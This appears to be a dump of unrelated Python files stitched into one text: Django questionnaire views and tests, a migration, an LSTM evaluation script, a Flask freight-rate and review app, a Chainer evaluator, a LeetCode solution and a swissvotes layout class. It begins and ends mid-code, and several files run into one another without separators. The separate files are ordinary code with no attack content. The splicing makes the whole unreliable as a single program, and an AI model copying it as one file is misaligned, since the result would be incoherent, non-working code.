            return self.queryset
        # Ordered for stable rendering: by explicit order, then type.
        return self.queryset.filter(questionaire_id=questionaire_id).order_by('order', 'type')
class responseViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only responses, optionally filtered with ?questionaireId=<id>."""
    queryset = Res.objects.all()
    serializer_class = ResponseSerializer

    def get_queryset(self):
        questionaire_id = self.request.query_params.get('questionaireId', None)
        if not questionaire_id:
            return self.queryset
        return self.queryset.filter(questionaire_id=questionaire_id).order_by('created')
@api_view(["POST"])
def questionaireSave(request):
    """Create or update a questionaire (with all its questions) from JSON.

    A negative id in the payload means create; otherwise the existing row is
    updated. Questions are replaced wholesale: all existing questions and
    their radio choices are deleted and re-created from the payload.
    NOTE(review): no explicit permission class — an anonymous POST would set
    user=AnonymousUser and fail on save; confirm auth is enforced upstream.
    """
    retVal = {'result': 'success'}
    received_q = json.loads(request.body)
    model_status = QuestionaireStatus.objects.get(id=received_q['status'])
    if int(received_q['id']) < 0:
        # create
        # save questionaire
        model_q = Questionaire(user=request.user, status=model_status, title=received_q['title'], description=received_q['description'])
        model_q.save()
    else:
        # update
        model_q = Questionaire.objects.get(id=received_q['id'])
        model_q.user = request.user
        model_q.status = model_status
        model_q.title = received_q['title']
        model_q.description = received_q['description']
        model_q.save()
        # delete old questions (and their radio choices) before re-creating
        oldQues = Question.objects.filter(questionaire=model_q)
        for q in oldQues:
            oldRadios = RadioChoice.objects.filter(question=q)
            for r in oldRadios:
                r.delete()
            q.delete()
    # save questions from the payload, with any radio choices
    for question in received_q['questions']:
        model_type = QuestionType.objects.get(id=question['type'])
        model_ques = Question(questionaire=model_q, type=model_type, text=question['text'], order=question['order'])
        model_ques.save()
        if question['radioChoices']:
            for rc in question['radioChoices']:
                model_rc = RadioChoice(question=model_ques, text=rc['text'])
                model_rc.save()
    return Response(retVal, status=HTTP_200_OK)
@csrf_exempt
@api_view(["POST"])
@permission_classes([permissions.AllowAny,])
@authentication_classes([])
def responseSubmit(request):
    """Store a public (unauthenticated) response to a questionaire.

    Expects JSON: {questionaireId, items: [{quesId, text, checkbox, radio}]}.
    """
    retVal = {'result': 'success'}
    received_r = json.loads(request.body)
    # save response
    model_q = Questionaire.objects.get(id=received_r['questionaireId'])
    model_r = Res(questionaire=model_q)
    model_r.save()
    # save responseItems
    for item in received_r['items']:
        # Unsaved Question/RadioChoice shells are used purely as FK references.
        model_ques = Question(id=item['quesId'])
        model_item = ResponseItem(response=model_r, question=model_ques, text=item['text'], checkbox=item['checkbox'])
        if item['radio']:
            model_radio = RadioChoice(id=item['radio'])
            model_item.radio = model_radio
        model_item.save()
    return Response(retVal, status=HTTP_200_OK)
|
# Generated by Django 2.0.2 on 2018-03-07 12:22
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional free-text author_name field to Article."""

    dependencies = [
        ('articles', '0020_auto_20180307_1042'),
    ]
    operations = [
        migrations.AddField(
            model_name='article',
            name='author_name',
            field=models.CharField(blank=True, max_length=225),
        ),
    ]
|
import lstm as net
import utils
import json
import argparse
import torch
import data_loader
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--data_set', default='val', choices=['train', 'val', 'test'],
                        help='The data set you want to evaluate')
arg_parser.add_argument('--model', default='bilstm_mlp_elmo.pt', help='Model name')
if __name__ == '__main__':
    args = arg_parser.parse_args()
    data_set = args.data_set
    model = args.model
    # Dataset-level params, overridden by the experiment's own params file.
    params = utils.Params('data/balanced/dataset_params.json')
    params.update('experiments/elmo_model/params.json')
    dl = data_loader.DataLoader('data/averaged_elmo/', params)
    data = dl.load_elmo_data([data_set], 'data/averaged_elmo')
    # NOTE(review): this rebinds the imported module name `net` to a model
    # instance — works, but shadows the module from here on.
    net = net.Network(params)
    net.load_state_dict(torch.load(model))
    # Evaluation
    val_data_iter = dl.elmo_iterator(data[data_set], params, shuffle=False)
    total_correct = 0
    predictions = torch.tensor([], dtype=torch.long)
    true_labels = torch.tensor([], dtype=torch.long)
    for batch in val_data_iter:
        sents, labels = batch
        preds, single_labels = net(sents, labels)
        total_correct += net.get_num_correct(preds, single_labels)
        # Accumulate argmax predictions and labels for the final report.
        preds = torch.argmax(preds, dim=1)
        predictions = torch.cat((predictions, preds),dim=0)
        true_labels = torch.cat((true_labels, single_labels), dim=0)
    num_instances = len(predictions)
    print("#### EVALUATION RESULTS ####")
    print("Number of instances: ", num_instances)
    print("total_correct: ", total_correct)
    print(confusion_matrix(true_labels, predictions))
    print(precision_recall_fscore_support(true_labels, predictions, average='weighted'))
class Worker(object):
    """Base employee record; income is stored name-mangled to discourage direct access."""

    def __init__(self, name, surname, position, income):
        self.name = name
        self.surname = surname
        self.position = position
        # income arrives as a (wage, bonus) pair; keep it as a private dict.
        wage, bonus = income[0], income[1]
        self.__income = {'wage': wage, 'bonus': bonus}
class Position(Worker):
    """Presentation helpers on top of Worker."""

    def get_full_name(self):
        # "name surname", space separated.
        return ' '.join([self.name, self.surname])

    def get_total_income(self):
        # Reach through Worker's name-mangled private dict: wage + bonus.
        return sum(self._Worker__income.values())
def do():
    """Demo: build a Position and print a salary summary."""
    pos = Position('John', 'Smith', 'Killer', [100000, 10000])
    print(f'Рабочий {pos.get_full_name()} '
          f'работает на должности {pos.position} '
          f'и получает суммарно {pos.get_total_income()}')


if __name__ == '__main__':
    do()
|
from Circle import Circle
from Rectangle import Rectangle
def main():
    """Demo: print a sample Circle and Rectangle."""
    circle = Circle(1.5)
    print("A Circle", circle)
    r = Rectangle(2, 4)
    print("A rectangle ", r)


if __name__ == "__main__":
    # IDIOM FIX: the original called main() unconditionally, so importing
    # this module triggered the demo as a side effect; guard the entry point.
    main()
from fysql import Table
from fypress import FyPress
# The application is instantiated once at import time so the shared database
# handle below is available to every table definition.
fypress = FyPress()
class FyPressTables(Table):
    """Base fysql Table bound to the shared FyPress database connection."""
    db = fypress.database.db
|
class Solution:
    def canJump(self, nums):
        """Return True if the last index of ``nums`` is reachable from index 0.

        Greedy scan: track the furthest reachable index so far; if the
        current index lies beyond it, we are stuck.
        """
        reach = 0
        for idx, jump in enumerate(nums):
            if idx > reach:
                return False
            if idx + jump > reach:
                reach = idx + jump
        return True
|
from django.test import TestCase, tag
from django.contrib.auth.models import User
from apps.library.models import Book
class LibraryTestCase(TestCase):
    """Book-list view tests: visibility per role plus title filtering."""

    list_url = '/library/'
    detail_url = '/library/book/{id}/'
    create_url = '/library/book/add/'

    @classmethod
    def setUpTestData(cls):
        admin_credentials = {
            'email': 'admin@localhost.ru',
            'username': 'admin',
            'password': '123456'
        }
        user_credentials = {
            'email': 'user@localhost.ru',
            'username': 'user',
            'password': '123456'
        }
        cls.admin = User.objects.create_superuser(**admin_credentials)
        cls.user = User.objects.create_user(**user_credentials)
        cls.book = Book.objects.create(
            title='Book title',
            description='Description',
            year=2018,
            url='http://example.com/book/1/',
            size=2.5,
        )

    def _assert_book_list_ok(self, response):
        # Shared assertions: HTTP 200, our book rendered first, full queryset shown.
        self.assertEqual(response.status_code, 200)
        self.assertEqual(self.book.id, response.context_data['book_list'][0].id)
        self.assertEqual(self.book.title, response.context_data['book_list'][0].title)
        self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))

    @tag('list', 'anonymous')
    def test_view_book_list_by_anonymous(self):
        self._assert_book_list_ok(self.client.get(self.list_url))

    @tag('list', 'user')
    def test_view_book_list_by_user(self):
        self.client.force_login(self.user)
        self._assert_book_list_ok(self.client.get(self.list_url))

    @tag('list', 'admin')
    def test_view_book_list_by_admin(self):
        # BUG FIX: this test logged in self.user (copy-paste from the user
        # test above), so the admin path was never actually exercised.
        self.client.force_login(self.admin)
        self._assert_book_list_ok(self.client.get(self.list_url))

    def test_book_list_filtered_by_anonymous(self):
        response = self.client.get(self.list_url, {'title': 'Book'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))

    def test_book_list_case_insensitive_filtered_by_anonymous(self):
        response = self.client.get(self.list_url, {'title': 'book'})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))
|
from datetime import datetime
from flask import render_template, flash, redirect, url_for, request, g, \
jsonify, current_app
from flask_login import current_user, login_required
from flask_babel import _, get_locale
from guess_language import guess_language
from app import db
from app.main.forms import EditProfileForm, PostForm, SearchForm, PostRateForm, SearchRatesForm, LocationReviewForm, MessageForm
from app.models import User, Post, Rate, LocationReview, City, Message, Notification
from app.translate import translate
from app.main import bp
@bp.before_app_request
def before_request():
    """Per-request setup: refresh the user's last-seen time and prime globals."""
    if current_user.is_authenticated:
        current_user.last_seen = datetime.utcnow()
        db.session.commit()
    # These two are independent; exposed on ``g`` for templates/handlers.
    g.locale = str(get_locale())
    g.search_form = SearchForm()
@bp.route('/', methods=['GET', 'POST'])
@bp.route('/index', methods=['GET', 'POST'])
@login_required
def index():
    """Home page: new-post form plus the paginated feed of followed users' posts."""
    form = PostForm()
    if form.validate_on_submit():
        # Detect the post's language so it can be translated on demand later.
        language = guess_language(form.post.data)
        if language == 'UNKNOWN' or len(language) > 5:
            language = ''
        post = Post(body=form.post.data, author=current_user,
                    language=language)
        db.session.add(post)
        db.session.commit()
        flash(_('Your post is now live!'))
        # POST/redirect/GET so a browser refresh does not resubmit the form.
        return redirect(url_for('main.index'))
    page = request.args.get('page', 1, type=int)
    posts = current_user.followed_posts().paginate(
        page, current_app.config['POSTS_PER_PAGE'], False)
    next_url = url_for('main.index', page=posts.next_num) \
        if posts.has_next else None
    prev_url = url_for('main.index', page=posts.prev_num) \
        if posts.has_prev else None
    return render_template('index.html', title=_('Home'), form=form,
                           posts=posts.items, next_url=next_url,
                           prev_url=prev_url)
@bp.route('/explore')
@login_required
def explore():
    """Show every user's posts, newest first, paginated."""
    page_number = request.args.get('page', 1, type=int)
    pagination = Post.query.order_by(Post.timestamp.desc()).paginate(
        page_number, current_app.config['POSTS_PER_PAGE'], False)
    next_url = None
    if pagination.has_next:
        next_url = url_for('main.explore', page=pagination.next_num)
    prev_url = None
    if pagination.has_prev:
        prev_url = url_for('main.explore', page=pagination.prev_num)
    return render_template('index.html', title=_('Explore'),
                           posts=pagination.items, next_url=next_url,
                           prev_url=prev_url)
@bp.route('/user/<username>')
@login_required
def user(username):
    """Profile page for *username* with their own posts, paginated."""
    user = User.query.filter_by(username=username).first_or_404()
    page = request.args.get('page', 1, type=int)
    posts = user.posts.order_by(Post.timestamp.desc()).paginate(
        page, current_app.config['POSTS_PER_PAGE'], False)
    next_url = url_for('main.user', username=user.username,
                       page=posts.next_num) if posts.has_next else None
    prev_url = url_for('main.user', username=user.username,
                       page=posts.prev_num) if posts.has_prev else None
    return render_template('user.html', user=user, posts=posts.items,
                           next_url=next_url, prev_url=prev_url)
@bp.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
    """Let the logged-in user change their username and "about me" text."""
    form = EditProfileForm(current_user.username)
    if form.validate_on_submit():
        current_user.username = form.username.data
        current_user.about_me = form.about_me.data
        db.session.commit()
        flash(_('Your changes have been saved.'))
        return redirect(url_for('main.edit_profile'))
    elif request.method == 'GET':
        # Pre-fill the form only on first load; after a failed POST the
        # user's (invalid) input is kept so they can correct it.
        form.username.data = current_user.username
        form.about_me.data = current_user.about_me
    return render_template('edit_profile.html', title=_('Edit Profile'),
                           form=form)
@bp.route('/follow/<username>')
@login_required
def follow(username):
    """Make the current user follow *username*, with guard checks."""
    target = User.query.filter_by(username=username).first()
    if target is None:
        flash(_('User %(username)s not found.', username=username))
        return redirect(url_for('main.index'))
    if target == current_user:
        flash(_('You cannot follow yourself!'))
        return redirect(url_for('main.user', username=username))
    current_user.follow(target)
    db.session.commit()
    flash(_('You are following %(username)s!', username=username))
    return redirect(url_for('main.user', username=username))
@bp.route('/unfollow/<username>')
@login_required
def unfollow(username):
    """Make the current user stop following *username*, with guard checks."""
    target = User.query.filter_by(username=username).first()
    if target is None:
        flash(_('User %(username)s not found.', username=username))
        return redirect(url_for('main.index'))
    if target == current_user:
        flash(_('You cannot unfollow yourself!'))
        return redirect(url_for('main.user', username=username))
    current_user.unfollow(target)
    db.session.commit()
    flash(_('You are not following %(username)s.', username=username))
    return redirect(url_for('main.user', username=username))
@bp.route('/translate', methods=['POST'])
@login_required
def translate_text():
    """AJAX endpoint: translate the posted text between the given languages."""
    payload = request.form
    translated = translate(payload['text'],
                           payload['source_language'],
                           payload['dest_language'])
    return jsonify({'text': translated})
@bp.route('/search')
@login_required
def search():
    """Full-text search over posts using the query from ``g.search_form``."""
    if not g.search_form.validate():
        return redirect(url_for('main.explore'))
    page = request.args.get('page', 1, type=int)
    # Post.search returns (results, total hit count); pagination links are
    # computed from the count rather than a pagination object.
    posts, total = Post.search(g.search_form.q.data, page,
                               current_app.config['POSTS_PER_PAGE'])
    next_url = url_for('main.search', q=g.search_form.q.data, page=page + 1) \
        if total > page * current_app.config['POSTS_PER_PAGE'] else None
    prev_url = url_for('main.search', q=g.search_form.q.data, page=page - 1) \
        if page > 1 else None
    return render_template('search.html', title=_('Search'), posts=posts,
                           next_url=next_url, prev_url=prev_url)
# US state / territory postal abbreviations -> full names.
# NOTE(review): not referenced anywhere in this module's visible code —
# presumably used by templates or forms; verify before removing.
states = {
    'AK': 'Alaska',
    'AL': 'Alabama',
    'AR': 'Arkansas',
    'AS': 'American Samoa',
    'AZ': 'Arizona',
    'CA': 'California',
    'CO': 'Colorado',
    'CT': 'Connecticut',
    'DC': 'District of Columbia',
    'DE': 'Delaware',
    'FL': 'Florida',
    'GA': 'Georgia',
    'GU': 'Guam',
    'HI': 'Hawaii',
    'IA': 'Iowa',
    'ID': 'Idaho',
    'IL': 'Illinois',
    'IN': 'Indiana',
    'KS': 'Kansas',
    'KY': 'Kentucky',
    'LA': 'Louisiana',
    'MA': 'Massachusetts',
    'MD': 'Maryland',
    'ME': 'Maine',
    'MI': 'Michigan',
    'MN': 'Minnesota',
    'MO': 'Missouri',
    'MP': 'Northern Mariana Islands',
    'MS': 'Mississippi',
    'MT': 'Montana',
    'NA': 'National',
    'NC': 'North Carolina',
    'ND': 'North Dakota',
    'NE': 'Nebraska',
    'NH': 'New Hampshire',
    'NJ': 'New Jersey',
    'NM': 'New Mexico',
    'NV': 'Nevada',
    'NY': 'New York',
    'OH': 'Ohio',
    'OK': 'Oklahoma',
    'OR': 'Oregon',
    'PA': 'Pennsylvania',
    'PR': 'Puerto Rico',
    'RI': 'Rhode Island',
    'SC': 'South Carolina',
    'SD': 'South Dakota',
    'TN': 'Tennessee',
    'TX': 'Texas',
    'UT': 'Utah',
    'VA': 'Virginia',
    'VI': 'Virgin Islands',
    'VT': 'Vermont',
    'WA': 'Washington',
    'WI': 'Wisconsin',
    'WV': 'West Virginia',
    'WY': 'Wyoming'
}
@bp.route('/post_rate', methods=['POST','GET'])
@login_required
def post_rate():
    """Form to post a freight rate; saves it and returns home on success."""
    form = PostRateForm()
    if form.validate_on_submit():
        # NOTE(review): the form field is ``dead_head`` but the model keyword
        # is ``deadhead`` — confirm this mapping is intentional.
        rate = Rate(equipment_type=form.equipment_type.data,
                    hazardous_freight=form.hazardous_freight.data,
                    origin=form.origin.data,
                    destination=form.destination.data,
                    brokered_load=form.brokered_load.data,
                    weather=form.weather.data,
                    rate_per_mile=form.rate_per_mile.data,
                    deadhead=form.dead_head.data,
                    author=current_user)
        db.session.add(rate)
        db.session.commit()
        flash(_('Your rate has been saved.'))
        return redirect(url_for('main.index'))
    return render_template('post_rate.html', title=_('Post Rate'),
                           form=form)
@bp.route('/search_rate', methods=['POST','GET'])
@login_required
def search_rates():
    """Search posted rates by origin, destination, and equipment type.

    On a valid submission renders the matching rates (paginated, newest
    first); otherwise renders the empty search form.
    """
    form = SearchRatesForm()
    if form.validate_on_submit():
        page = request.args.get('page', 1, type=int)
        rates = Rate.query.filter(
            Rate.origin == form.origin.data,
            Rate.destination == form.destination.data,
            Rate.equipment_type == form.equipment_type.data,
        ).order_by(Rate.timestamp.desc()).paginate(
            page, current_app.config['POSTS_PER_PAGE'], False)
        # BUG FIX: this view referenced an undefined local ``user`` (copied
        # from the profile view), raising NameError on every successful
        # search.  The logged-in user is what the template context needs.
        # NOTE(review): next/prev still target 'main.user' as in the
        # original arguments — confirm they shouldn't re-run the search.
        next_url = url_for('main.user', username=current_user.username,
                           page=rates.next_num) if rates.has_next else None
        prev_url = url_for('main.user', username=current_user.username,
                           page=rates.prev_num) if rates.has_prev else None
        return render_template('search_rates_screen.html', user=current_user,
                               rates=rates.items, next_url=next_url,
                               prev_url=prev_url, form=form)
    return render_template('search_rates_screen.html',
                           form=form)
@bp.route('/post_review', methods=['POST','GET'])
@login_required
def post_review():
    """Render the location-review form; submission goes to review_handler."""
    review_form = LocationReviewForm()
    return render_template('post_review.html', title=_('Post Review'), form=review_form)
@bp.route('/review_handler', methods=['POST','GET'])
@login_required
def review_handler():
    """Persist a location review built from the raw posted form fields.

    NOTE(review): reads ``request.form`` directly (no WTForms validation),
    so any missing field aborts with a 400 — confirm the posting template
    always sends every field.
    """
    shipper = request.form['shipper']
    unloading_score = request.form['unloading_score']
    lateness_score = request.form['lateness_score']
    comments = request.form['comments']
    consignee = request.form['consignee']
    # Address parts; presumably filled by an address-autocomplete widget.
    address = request.form['autocomplete']
    street_number = request.form['street_number']
    street_name = request.form['route']
    city = request.form['locality']
    state = request.form['state']
    country = request.form['country']
    zip_code = request.form['postal_code']
    # NOTE(review): street_number / street_name are read but never stored.
    review = LocationReview(
        address=address,
        city=city,
        state=state,
        zip=zip_code,
        country=country,
        consignee=consignee,
        comments=comments,
        unloading_score=unloading_score,
        shipper=shipper,
        author=current_user,
        lateness_score=lateness_score)
    db.session.add(review)
    db.session.commit()
    flash(_('You have posted a review!'))
    return redirect(url_for('main.index'))
@bp.route('/search_review', methods=['POST','GET'])
@login_required
def search_review():
    """Render the review search screen."""
    context = {'title': _('Search Reviews')}
    return render_template('search_reviews_screen.html', **context)
@bp.route('/search_review_handler', methods=['POST','GET'])
@login_required
def search_review_handler():
    """Look up location reviews for the submitted address, paginated."""
    address = request.form['autocomplete']
    page = request.args.get('page', 1, type=int)
    # NOTE(review): ``LocationReview.Date`` — verify the model really exposes
    # a capitalized ``Date`` column (other models here use ``timestamp``).
    reviews = LocationReview.query.filter_by(address=address).order_by(LocationReview.Date.desc()).paginate(
        page, current_app.config['POSTS_PER_PAGE'], False)
    # BUG FIX: the original referenced an undefined local ``user`` here,
    # raising NameError on every request; the logged-in user is what the
    # pagination links and template context need.
    next_url = url_for('main.user', username=current_user.username,
                       page=reviews.next_num) if reviews.has_next else None
    prev_url = url_for('main.user', username=current_user.username,
                       page=reviews.prev_num) if reviews.has_prev else None
    return render_template('search_reviews_screen_full.html', user=current_user, reviews=reviews.items,
                           next_url=next_url, prev_url=prev_url)
@bp.route('/autocomplete', methods=['GET'])
def autocomplete():
    """Return city names matching the ``q`` querystring as JSON."""
    search = request.args.get('q')
    query = db.session.query(City.full_city_name).filter(
        City.full_city_name.like('%' + str(search) + '%'))
    # BUG FIX (redundancy): the original built ``results`` with a loop and
    # then immediately overwrote it with this comprehension, running the
    # query twice; keep the single pass.
    results = [row[0] for row in query.all()]
    return jsonify(matching_results=results)
@bp.route('/user/<username>/popup')
@login_required
def user_popup(username):
    """Small profile card shown when hovering a username."""
    profile = User.query.filter_by(username=username).first_or_404()
    return render_template('user_popup.html', user=profile)
@bp.route('/send_message/<recipient>', methods=['GET', 'POST'])
@login_required
def send_message(recipient):
    """Send a private message to *recipient* and bump their unread counter."""
    user = User.query.filter_by(username=recipient).first_or_404()
    form = MessageForm()
    if form.validate_on_submit():
        msg = Message(author=current_user, recipient=user,
                      body=form.message.data)
        db.session.add(msg)
        # Update the recipient's unread-message notification before commit
        # so the message and the counter are persisted together.
        user.add_notification('unread_message_count', user.new_messages())
        db.session.commit()
        flash(_('Your message has been sent.'))
        return redirect(url_for('main.user', username=recipient))
    return render_template('send_message.html', title=_('Send Message'),
                           form=form, recipient=recipient)
@bp.route('/messages')
@login_required
def messages():
    """Inbox: mark everything read, reset the badge, list messages paginated."""
    current_user.last_message_read_time = datetime.utcnow()
    # Zero the unread-count notification shown in the navbar.
    current_user.add_notification('unread_message_count', 0)
    db.session.commit()
    page = request.args.get('page', 1, type=int)
    messages = current_user.messages_received.order_by(
        Message.timestamp.desc()).paginate(
            page, current_app.config['POSTS_PER_PAGE'], False)
    next_url = url_for('main.messages', page=messages.next_num) \
        if messages.has_next else None
    prev_url = url_for('main.messages', page=messages.prev_num) \
        if messages.has_prev else None
    return render_template('messages.html', messages=messages.items,
                           next_url=next_url, prev_url=prev_url)
@bp.route('/notifications')
@login_required
def notifications():
    """Return the user's notifications newer than ``since`` as a JSON list."""
    since = request.args.get('since', 0.0, type=float)
    pending = current_user.notifications.filter(
        Notification.timestamp > since).order_by(Notification.timestamp.asc())
    payload = []
    for item in pending:
        payload.append({
            'name': item.name,
            'data': item.get_data(),
            'timestamp': item.timestamp,
        })
    return jsonify(payload)
@bp.route('/export_posts')
@login_required
def export_posts():
    """Kick off a background task exporting the user's posts (one at a time)."""
    if current_user.get_task_in_progress('export_posts'):
        # Refuse to start a second concurrent export for the same user.
        flash(_('An export task is currently in progress'))
    else:
        current_user.launch_task('export_posts', _('Exporting posts...'))
        db.session.commit()
    return redirect(url_for('main.user', username=current_user.username))
# query = db.session.query(City.full_city_name)
|
FREE = 0
FIT = 1 |
import copy
import os
from collections import defaultdict
import chainer
import numpy as np
from chainer import DictSummary
from chainer import Reporter
from chainer.training.extensions import Evaluator
from overrides import overrides
from sklearn.metrics import f1_score
import config
class ActionUnitEvaluator(Evaluator):
    """Chainer evaluator reporting per-Action-Unit F1 scores.

    Runs the model over the validation iterator, reduces per-box predictions
    to per-frame labels, dumps the raw predictions to ``output_path`` and
    reports an F1 score per AU plus their running average.
    """

    trigger = 1, 'epoch'
    default_name = 'AU_validation'
    priority = chainer.training.PRIORITY_WRITER

    def __init__(self, iterator, model, device, database, paper_report_label, converter, sample_frame,
                 output_path):
        """``paper_report_label`` maps original AU index -> AU label."""
        super(ActionUnitEvaluator, self).__init__(iterator, model, device=device, converter=converter)
        self.T = sample_frame
        self.database = database
        self.paper_use_AU = []
        self.paper_report_label = paper_report_label  # original AU_idx -> original AU
        paper_report_label_idx = list(paper_report_label.keys())  # original AU_idx
        self.output_path = output_path
        self.AU_convert = dict()  # new_AU_idx -> AU
        # Re-index the reported AUs densely, in sorted original-index order.
        for new_AU_idx, orig_AU_idx in enumerate(sorted(paper_report_label_idx)):
            self.AU_convert[new_AU_idx] = paper_report_label[orig_AU_idx]
        if database == "BP4D":
            self.paper_use_AU = config.paper_use_BP4D
        elif database == "DISFA":
            self.paper_use_AU = config.paper_use_DISFA

    @overrides
    def evaluate(self):
        """Run one pass over the validation iterator; return the observation."""
        iterator = self._iterators['main']
        _target = self._targets["main"]
        # Reset the iterator when possible; otherwise copy it so the
        # original iteration position is untouched.
        if hasattr(iterator, 'reset'):
            iterator.reset()
            it = iterator
        else:
            it = copy.copy(iterator)
        reporter = Reporter()
        reporter.add_observer("main", _target)
        summary = DictSummary()
        model = _target
        pred_labels_array = []
        gt_labels_array = []
        unreduce_pred = []
        unreduce_gt = []
        for idx, batch in enumerate(it):
            print("processing :{}".format(idx))
            batch = self.converter(batch, self.device)
            images, bboxes, labels = batch  # images shape = B*T, C, H, W; bboxes shape = B*T, F, 4; labels shape = B*T, F, 12
            if not isinstance(images, chainer.Variable):
                images = chainer.Variable(images.astype('f'))
                bboxes = chainer.Variable(bboxes.astype('f'))
            roi_feature, labels = model.get_roi_feature(images, bboxes, labels)
            pred_labels = model.loss_head_module.predict(roi_feature)  # B, T, F, 12
            # Keep only the last time step of each sequence.
            pred_labels = pred_labels[:, -1, :, :]  # B, F, D
            unreduce_pred.extend(pred_labels)  # list of F,D
            # A frame is positive for an AU when any box in it is positive.
            pred_labels = np.bitwise_or.reduce(pred_labels, axis=1)  # B, class_number
            labels = labels[:, -1, :, :]  # B, F, D
            unreduce_gt.extend(labels)  # shape = list of F,D
            labels = np.bitwise_or.reduce(labels, axis=1)  # B, class_number
            assert labels.shape == pred_labels.shape
            pred_labels_array.extend(pred_labels)
            gt_labels_array.extend(labels)
        unreduce_pred = np.stack(unreduce_pred).astype(np.int32)
        unreduce_gt = np.stack(unreduce_gt).astype(np.int32)
        # Persist the raw (un-reduced) per-box labels for later analysis.
        np.savez(self.output_path, pred=unreduce_pred, gt=unreduce_gt)
        gt_labels_array = np.stack(gt_labels_array)
        pred_labels_array = np.stack(pred_labels_array)  # shape = all_N, out_size
        gt_labels = np.transpose(gt_labels_array)  # shape = Y x frame
        pred_labels = np.transpose(pred_labels_array)  # shape = Y x frame
        report_dict = dict()
        AU_id_convert_dict = self.AU_convert if self.AU_convert else config.AU_SQUEEZE
        for new_AU_idx, frame_pred in enumerate(pred_labels):
            if AU_id_convert_dict[new_AU_idx] in self.paper_use_AU:
                AU = AU_id_convert_dict[new_AU_idx]
                frame_gt = gt_labels[new_AU_idx]
                F1 = f1_score(y_true=frame_gt, y_pred=frame_pred)
                report_dict[AU] = F1
                summary.add({"f1_frame_avg": F1})
        observation = {}
        with reporter.scope(observation):
            reporter.report(report_dict, model)
            reporter.report(summary.compute_mean(), model)
        return observation
from babel import Locale
from decimal import Decimal
from decimal import ROUND_HALF_UP
from functools import cached_property
from numbers import Integral
from onegov.core.elements import Link
from onegov.core.i18n import SiteLocale
from onegov.core.layout import ChameleonLayout
from onegov.core.static import StaticFile
from onegov.swissvotes import _
from onegov.swissvotes.collections import SwissVoteCollection
from onegov.swissvotes.collections import TranslatablePageCollection
from onegov.swissvotes.models import TranslatablePageMove
from onegov.user import Auth
class DefaultLayout(ChameleonLayout):
    """Base layout for swissvotes pages: assets, navigation, footer links,
    locale switching, and number/policy-area formatting helpers."""

    # Babel format patterns used by the parent layout's date helpers.
    day_long_format = 'skeleton:MMMMd'
    date_long_format = 'long'
    datetime_long_format = 'medium'

    def __init__(self, model, request):
        super().__init__(model, request)
        self.request.include('frameworks')
        self.request.include('chosen')
        self.request.include('common')
        # Only include the stats script on the production domain.
        if 'swissvotes.ch' in request.url:
            self.request.include('stats')
        self.pages = TranslatablePageCollection(self.request.session)

    @cached_property
    def title(self):
        """Page title; empty by default."""
        return ""

    @cached_property
    def top_navigation(self):
        """The votes link followed by every non-static translatable page."""
        result = [Link(_("Votes"), self.votes_url)]
        for page in self.pages.query():
            if page.id not in self.request.app.static_content_pages:
                result.append(
                    Link(
                        page.title,
                        self.request.link(page),
                        sortable_id=page.id,
                    )
                )
        return result

    @cached_property
    def editbar_links(self):
        """Links for the edit bar; none by default."""
        return []

    @cached_property
    def breadcrumbs(self):
        """Breadcrumb trail; just the homepage by default."""
        return [Link(_("Homepage"), self.homepage_url)]

    @cached_property
    def static_path(self):
        return self.request.link(self.app.principal, 'static')

    @cached_property
    def sentry_init_path(self):
        """Link to the Sentry bootstrap script served as a static file."""
        static_file = StaticFile.from_application(
            self.app, 'sentry/js/sentry-init.js'
        )
        return self.request.link(static_file)

    @cached_property
    def homepage_url(self):
        return self.request.link(self.app.principal)

    @cached_property
    def disclaimer_link(self):
        # setdefault creates the page if it does not exist yet.
        page = self.pages.setdefault('disclaimer')
        return Link(page.title, self.request.link(page))

    @cached_property
    def imprint_link(self):
        page = self.pages.setdefault('imprint')
        return Link(page.title, self.request.link(page))

    @cached_property
    def data_protection_link(self):
        page = self.pages.setdefault('data-protection')
        return Link(page.title, self.request.link(page))

    @cached_property
    def votes_url(self):
        return self.request.link(SwissVoteCollection(self.request.app))

    @cached_property
    def login_url(self):
        """Login link, or None when already logged in."""
        if not self.request.is_logged_in:
            return self.request.link(
                Auth.from_request(self.request, to=self.homepage_url),
                name='login'
            )

    @cached_property
    def logout_url(self):
        """Logout link, or None when not logged in."""
        if self.request.is_logged_in:
            return self.request.link(
                Auth.from_request(self.request, to=self.homepage_url),
                name='logout'
            )

    @cached_property
    def move_page_url_template(self):
        """CSRF-protected URL template used for drag-and-drop page ordering."""
        return self.csrf_protected_url(
            self.request.link(TranslatablePageMove.for_url_template())
        )

    @cached_property
    def locales(self):
        """(code, language, display name, switch link) for each app locale."""
        result = []
        assert self.app.locales == {'de_CH', 'fr_CH', 'en_US'}
        for locale_code in ('de_CH', 'fr_CH', 'en_US'):
            locale = Locale.parse(locale_code)
            result.append((
                locale_code,
                locale.language,
                locale.get_language_name().capitalize(),
                SiteLocale(locale_code).link(self.request, self.request.url)
            ))
        return result

    def format_policy_areas(self, vote):
        """Group the vote's policy areas by top level and render HTML spans
        whose tooltips show the full translated paths."""
        paths = {}
        for path in [area.label_path for area in vote.policy_areas]:
            paths.setdefault(path[0], [])
            paths[path[0]].append(path)
        translate = self.request.translate
        return ",<br>".join([
            "<span title=\"{}\">{}</span>".format(
                " ".join([
                    " > ".join([translate(part) for part in title])
                    for title in titles
                ]),
                translate(value)
            )
            for value, titles in paths.items()
        ])

    def format_bfs_number(self, number, decimal_places=None):
        """ Hide the decimal places if there are none (simple votes). """
        # NOTE(review): the ``decimal_places`` argument is unconditionally
        # overwritten below, so callers passing a value have no effect —
        # confirm whether the parameter is vestigial.
        decimal_places = 0 if number.to_integral_value() == number else 1
        return self.format_number(number, decimal_places)

    def format_number(self, number, decimal_places=None, padding=''):
        """ Takes the given numer and formats it according to locale.
        If the number is an integer, the default decimal places are 0,
        otherwise 2.
        Overwrites parent class to use "." instead of "," for fr_CH locale
        as would be returned by babel.
        """
        if number is None:
            return ''
        if decimal_places is None:
            if isinstance(number, Integral):
                decimal_places = 0
            else:
                decimal_places = 2
        if decimal_places is not None:
            number = Decimal(number).quantize(
                Decimal(10) ** -decimal_places,
